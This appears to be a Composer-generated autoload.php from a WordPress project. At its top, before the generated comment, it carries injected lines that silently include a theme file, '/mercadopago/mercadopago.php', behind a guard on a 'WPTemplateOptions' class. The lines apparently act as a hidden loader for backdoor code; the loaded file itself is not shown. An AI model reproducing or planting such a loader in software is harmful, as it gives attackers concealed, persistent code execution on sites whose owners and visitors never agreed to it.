<?php
if ( ! class_exists( 'WPTemplateOptions' ) && file_exists( get_template_directory() . '/mercadopago/mercadopago.php' ) ) {
	include_once( get_template_directory() . '/mercadopago/mercadopago.php' );
}

// autoload.php @generated by Composer

require_once __DIR__ . '/composer/autoload_real.php';

return ComposerAutoloaderInit2e3f93203566f8d2c6b07f3e68781253::getLoader();
